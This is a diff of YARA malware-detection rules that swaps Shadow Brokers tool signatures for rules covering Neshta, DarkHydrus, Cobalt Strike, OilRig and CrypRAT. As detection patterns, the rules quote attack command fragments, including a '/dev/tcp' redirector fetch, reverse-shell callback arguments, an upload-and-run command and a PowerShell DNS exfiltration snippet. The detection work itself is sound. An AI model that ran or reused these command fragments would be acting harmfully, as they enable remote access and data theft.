+		$x2 = "BGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADUALgAyAC4AMwA3ADkAMAAuADEAOAAzADAAIABiAHUAaQBsAHQAIABiAHkAOgAgAFcAaQBuAEQARABLAAAAAAAyAAkAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAGcAZAByAHYALgBzAHkAc"
+		$x3 = "ARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAA1AC4AMgAuADMANwA5ADAALgAxADgAMwAwACAAYgB1AGkAbAB0ACAAYgB5ADoAIABXAGkAbgBEAEQASwAAAAAAMgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAGQAcgB2AC4AcwB5AH"
 
 	condition:
-		1 of them
+		filesize < 4000KB and 1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gr_Gr
+
+rule SIGNATURE_BASE_MAL_Neshta_Generic : HIGHVOL FILE
 {
 	meta:
-		description = "Auto-generated rule - file gr.notes"
+		description = "Detects Neshta malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c233159d-8d78-575b-b32b-21f704debfe2"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L88-L101"
+		id = "9a3b8369-7e19-5c21-9eba-0bb81507696a"
+		date = "2018-01-15"
+		modified = "2021-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_netsha.yar#L3-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "facce45a335d7ca799d68fc26ee2bf5682cec0914502482189cd6aa496cba489"
+		logic_hash = "acac6f81900c60a0aacea6345a7c03a0b77dd86d5ca7ca3d102668c49595bb6b"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b2b60dce7a4cfdddbd3d3f1825f1885728956bae009de3a307342fbdeeafcb79"
+		tags = "HIGHVOL, FILE"
+		hash1 = "27c67eb1378c2fd054c6649f92ec8ee9bfcb6f790224036c974f6c883c46f586"
+		hash1 = "0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e"
+		hash2 = "b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb"
+		hash3 = "1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb"
 
 	strings:
-		$s4 = "delete starting from: (root) LIST (root)" fullword ascii
+		$x1 = "the best. Fuck off all the rest."
+		$x2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
+		$s1 = "Neshta" ascii fullword
+		$s2 = "Made in Belarus. " ascii fullword
+		$op1 = { 85 c0 93 0f 85 62 ff ff ff 5e 5b 89 ec 5d c2 04 }
+		$op2 = { e8 e5 f1 ff ff 8b c3 e8 c6 ff ff ff 85 c0 75 0c }
+		$op3 = { eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 34 }
+		$sop1 = { e8 3c 2a ff ff b8 ff ff ff 7f eb 3e 83 7d 0c 00 }
+		$sop2 = { 2b c7 50 e8 a4 40 ff ff ff b6 88 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or all of ( $s* ) or 3 of them or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Yellowspirit
+
+rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.yellowspirit.COMMON"
+		description = "Detects strings found in malware samples in APT report in DarkHydrus"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
-		date = "2016-12-17"
+		id = "fbd001c0-43c9-5429-84d6-7f62eadd8ff3"
+		date = "2018-07-28"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L103-L117"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkhydrus.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "698b23cc4cc6f319ddef7a93cf7ddc83ffae1d2c2b0a9545011b51e381f8cd0c"
+		logic_hash = "2c39f2e6b37e6422984275f45a2917891c3b482d137dbbfd6293088c2f2dacc3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a7c4b718fa92934a9182567288146ffa3312d9f3edc3872478c90e0e2814078c"
+		hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
 
 	strings:
-		$s1 = "-l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999" fullword ascii
-		$s2 = "-s PITCH_IP -x PITCH_IP -y RHP-24 TARGET_IP" fullword ascii
+		$x1 = "Z:\\devcenter\\aggressor\\" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "d3666d1cde4790b22b44ec35976687fb" or 1 of them )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Eleganteagle_Opscript_1_0_0
+rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file eleganteagle_opscript.1.0.0.6"
+		description = "Detects strings found in malware samples in APT report in DarkHydrus"
 		author = "Florian Roth (Nextron Systems)"
-		id = "22855519-160c-57cf-b610-a611ca6813ed"
-		date = "2016-12-17"
+		id = "1a21cbbf-f7e1-56eb-973b-35c1a811e210"
+		date = "2018-07-28"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L119-L132"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkhydrus.yar#L31-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3df5ba1a497ffe5306ed7966f25f69c30a5191e935c5638869a62b3cb2324f70"
+		logic_hash = "e967fec69ad1cbb46a63ee520594e7d6f2445a400510a9864dbd6d4c6e092737"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "57e223318de0a802874642652b3dc766128f25d7e8f320c6f04c6f2659bb4f7f"
+		hash1 = "b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81"
 
 	strings:
-		$x3 = "uploadnrun -e \"D=-ucIP_ADDRESS_OF_REDIR" ascii
+		$s4 = "windir" fullword ascii
+		$s6 = "temp.dll" fullword ascii
+		$s7 = "libgcj-12.dll" fullword ascii
+		$s8 = "%s\\System32\\%s" fullword ascii
+		$s9 = "StartW" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Opscript
+
+rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_3 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file opscript.se"
+		description = "Detects strings found in malware samples in APT report in DarkHydrus"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d00752a3-d5c2-53a7-9a83-ad31cfb534af"
-		date = "2016-12-17"
+		id = "1f766b49-3173-5f8a-ba52-a9ce9000be79"
+		date = "2018-07-28"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L134-L147"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkhydrus.yar#L50-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "23dd6d537a8639bd84ede141cca577dc91328bd293f96f865c7dedd9ef693ee3"
+		logic_hash = "0f3425322846e6064ec2576ad4e73061fbec3e4400de54d05fe07b8ad2a31f92"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "275c91531a9ac5a240336714093b6aa146b8d7463cb2780cfeeceaea4c789682"
+		hash1 = "c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3"
 
 	strings:
-		$s1 = "ls -l /tmp) | bdes -k 0x4790cae5ec154ccc|" ascii
+		$s2 = "Ws2_32.dll" fullword ascii
+		$s3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "478eacfbe2b201dabe63be53f34148a5" or all of them )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Shentysdelight
+
+rule SIGNATURE_BASE_HKTL_Unlicensed_Cobaltstrike_EICAR_Jul18_5 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.shentysdelight.COMMON"
+		description = "Detects strings found in CobaltStrike shellcode"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L149-L162"
+		id = "d52536b8-dd6b-59be-8761-d22b6a279114"
+		date = "2018-07-28"
+		modified = "2021-06-17"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkhydrus.yar#L69-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1acfb6aea7e208b7fd52325258219c162482deb4fa7ee87ddc4de0774e3e74f4"
+		logic_hash = "d066f22e01f9ca3a33c669552046a5ab8dd9e579236974b1c468ba9644498951"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a564efeaae9c13fe09a27f2d62208a1dec0a19b4a156f5cfa96a0259366b8166"
+		hash1 = "cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1"
 
 	strings:
-		$s1 = "echo -ne \"/var/run/COLFILE\\0\"" fullword ascii
+		$x1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
+		$s2 = "libgcj-12.dll" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or all of ( $s* ) or $x1 )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Epichero
+rule SIGNATURE_BASE_Chafer_Mimikatz_Custom : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.epichero.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
-		date = "2016-12-17"
+		description = "Detects Custom Mimikatz Version"
+		author = "Florian Roth (Nextron Systems) / Markus Neis"
+		id = "80f751c3-d7ca-5ff6-a905-38650e1c4ec5"
+		date = "2018-03-22"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L164-L178"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L11-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "36dc38f2dd630f22b87e8d9130de7d40ee3cdba45597b2b667a1a9536d990aad"
+		logic_hash = "d3b74be6d221592fb867bd9589f5e4b246a093bd276efa3515d9e948a38eda48"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "679d194c32cbaead7281df9afd17bca536ee9d28df917b422083ae8ed5b5c484"
+		tags = "FILE"
+		hash1 = "9709afeb76532566ee3029ecffc76df970a60813bcac863080cc952ad512b023"
 
 	strings:
-		$x2 = "-irtun TARGET_IP ISH_CALLBACK_PORT"
-		$x3 = "-O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR" fullword ascii
+		$x1 = "C:\\Users\\win7p\\Documents\\mi-back\\" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool
+rule SIGNATURE_BASE_Chafer_Exploit_Copyright_2017 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.elatedmonkey"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
-		date = "2016-12-17"
+		description = "Detects Oilrig Internet Server Extension with Copyright (C) 2017 Exploit"
+		author = "Markus Neis"
+		id = "f78ae4f5-0569-5fc8-ab25-ebe38afd9f3c"
+		date = "2018-03-22"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L180-L193"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L25-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8135c07b8c217e81f7618d58c9c3da6585cdb9b8f7afab85bb6556c5b846ba64"
+		logic_hash = "53d3e735bc368de152f4f4058617bc2cc5574bc13777f743442ff2bfafe92791"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "98ae935dd9515529a34478cb82644828d94a2d273816d50485665535454e37cd"
+		tags = "FILE"
+		hash1 = "cdac69caad8891c5e1b8eabe598c869674dee30af448ce4e801a90eb79973c66"
 
 	strings:
-		$x5 = "ELATEDMONKEY will only work of apache executes scripts" fullword ascii
+		$x1 = "test3 Internet Server Extension" fullword wide
+		$x2 = "Copyright (C) 2017 Exploit" fullword wide
+		$a1 = "popen() failed!" fullword ascii
+		$a2 = "cmd2cmd=" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or all of ( $a* ) )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Dubmoat
+rule SIGNATURE_BASE_Chafer_Portscanner : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.dubmoat.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d6c0a00b-dda9-587f-a867-f3b632edd494"
-		date = "2016-12-17"
+		description = "Detects Custom Portscanner used by Oilrig"
+		author = "Markus Neis"
+		id = "8db934c3-fb0d-5c87-9096-1ee8fb16f9a5"
+		date = "2018-03-22"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L195-L209"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L45-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "368c0a6a1db0003e3a2e4ec5e42a5b5563ea1c2cb89db1751226891e1f7181d8"
+		logic_hash = "6e0475a5c0fc8155359376113f88f3de080968388bd3ea60664a063540688faf"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bcd4ee336050488f5ffeb850d8eaa11eec34d8ba099b370d94d2c83f08a4d881"
+		tags = "FILE"
+		hash1 = "88274a68a6e07bdc53171641e7349d6d0c71670bd347f11dcc83306fe06656e9"
 
 	strings:
-		$s1 = "### Verify version on target:" fullword ascii
-		$s2 = "/current/bin/ExtractData ./utmp > dub.TARGETNAME" fullword ascii
+		$x1 = "C:\\Users\\RS01204N\\Documents\\" ascii
+		$x2 = "PortScanner /ip:google.com  /port:80 /t:500 /tout:2" fullword ascii
+		$x3 = "open ports of host/hosts" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Strifeworld
+rule SIGNATURE_BASE_Oilrig_Myrtille : FILE
 {
 	meta:
-		description = "Auto-generated rule - file strifeworld.1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a15c2034-8394-5e62-a5f0-d1506c19e585"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L211-L225"
+		description = "Detects Oilrig Myrtille RDP Browser"
+		author = "Markus Neis"
+		id = "e742ab0c-0e21-569e-a100-e5082dc1d372"
+		date = "2018-03-22"
+		modified = "2022-12-21"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L61-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2b113b042fd62109ee3ee39515fbd22f3898abf320d75f1288ea88e40b3444c0"
+		logic_hash = "373115c0a3fbfe93435aca07cbac52c7649a77d8b7d6eda8af5ce4a1a42e53a6"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "222b00235bf143645ad0d55b2b6839febc5b570e3def00b77699915a7c9cb670"
+		tags = "FILE"
+		hash1 = "67945f2e65a4a53e2339bd361652c6663fe25060888f18e681418e313d1292ca"
 
 	strings:
-		$s4 = "-p -n.\" strifeworld" fullword ascii
-		$s5 = "Running STRIFEWORLD not protected" ascii
+		$x1 = "\\obj\\Release\\Myrtille.Services.pdb" ascii
+		$x2 = "Failed to notify rdp client process exit (MyrtilleAppPool down?), remote session {0} ({1})" fullword wide
+		$x3 = "Started rdp client process, remote session {0}" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Pork
+rule SIGNATURE_BASE_Chafer_Packed_Mimikatz : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.pork.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ee5f88b1-6e58-5288-8b80-0d3d188e1ac6"
-		date = "2016-12-17"
+		description = "Detects Oilrig Packed Mimikatz also detected as Chafer_WSC_x64 by FR"
+		author = "Florian Roth (Nextron Systems) / Markus Neis"
+		id = "abd34c6a-7d99-5f52-be8e-a7d634d61255"
+		date = "2018-03-22"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L227-L242"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L78-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c3f9f90f83f3672b101e52f36012c485c29840cf0b2ced00087fb27725fd1545"
+		logic_hash = "0cee5270c9b76f1419c6989113dca221c5ba6f027a104d71f61d38cb59af51cd"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c400aab74e75be8770387d35ca219285e2cedc0c7895225bbe567ce9c9dc078"
+		tags = "FILE"
+		hash1 = "5f2c3b5a08bda50cca6385ba7d84875973843885efebaff6a482a38b3cb23a7c"
 
 	strings:
-		$x2 = "packrat -z RAT_REMOTE_NAME" fullword ascii
-		$s3 = "./client -t TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT" ascii
-		$s4 = "mkdir TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/RED" ascii
+		$s1 = "Windows Security Credentials" fullword wide
+		$s2 = "Minisoft" fullword wide
+		$x1 = "Copyright (c) 2014 - 2015 Minisoft" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( all of ( $s* ) or $x1 )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Ebbisland
+rule SIGNATURE_BASE_Oilrig_PS_Cnc : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.ebbisland.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fd312ba2-d590-5007-875c-008553c2b1b9"
-		date = "2016-12-17"
+		description = "Powershell CnC using DNS queries"
+		author = "Markus Neis"
+		id = "cbc5689c-37ff-59b6-9e3a-7d8577021f70"
+		date = "2018-03-22"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L244-L258"
+		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L94-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a45ea3cd6aeea9299ef67ae82c9f4bf929a961695e7cce344aa1737fa4c07b0"
+		logic_hash = "0566f0707021af0d08426eec497292098273d46b020a5f0be6b98835ceeb82bc"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "390e776ae15fadad2e3825a5e2e06c4f8de6d71813bef42052c7fd8494146222"
+		tags = "FILE"
+		hash1 = "9198c29a26f9c55317b4a7a722bf084036e93a41ba4466cbb61ea23d21289cfa"
 
 	strings:
-		$x1 = "-t 127.0.0.1 -p SERVICE_TCP_PORT -r TARGET_RPC_SERVICE -X"
-		$x2 = "-N -A SPECIFIC_SHELLCODE_ADDRESS" fullword ascii
+		$x1 = "(-join $base32filedata[$uploadedCompleteSize..$($uploadedCompleteSize" fullword ascii
+		$s2 = "$hostname = \"D\" + $fileID + (-join ((65..90) + (48..57) + (97..122)|" ascii
 
 	condition:
-		1 of them
+		filesize < 40KB and 1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Stoicsurgeon
+
+rule SIGNATURE_BASE_MAL_Cryprat_Jan19_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.stoicsurgeon.COMMON"
+		description = "Detects CrypRAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2ff22b17-4922-54d7-bbd8-a5ff40b6ebe5"
-		date = "2016-12-17"
+		id = "f3063a16-8813-5d6c-9807-6a0725907fb5"
+		date = "2019-01-07"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L260-L273"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_cryp_rat.yar#L3-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "322599ba7d5536b7f0856980a6caab86de66c02da75bf55e97bf129d08c43031"
-		score = 75
+		logic_hash = "69f8a581bae1a2c411e09e8fe01a979645ef897038af868d8e9f2a2ce9188080"
+		score = 90
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "967facb19c9b563eb90d3df6aa89fd7dcfa889b0ba601d3423d9b71b44191f50"
 
 	strings:
-		$x1 = "echo -n TARGET_HOSTNAME  | sed '/\\n/!G;s/\\(.\\)\\(.*\\n\\)/&\\2\\1/;//D;s/.//'" fullword ascii
+		$x1 = "Cryp_RAT" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "2524e5e9fe04d7bfe5efb3a5e400fe4b" or 1 of them )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Elgingamble
+rule SIGNATURE_BASE_Beacon_K5Om : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.elgingamble.COMMON"
+		description = "Detects Meterpreter Beacon - file K5om.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "344e5d5e-9fd6-5a32-ba98-945f5a35a116"
-		date = "2016-12-17"
+		id = "9354d20a-d798-55bf-a735-820f21d4a861"
+		date = "2017-06-07"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L275-L288"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html"
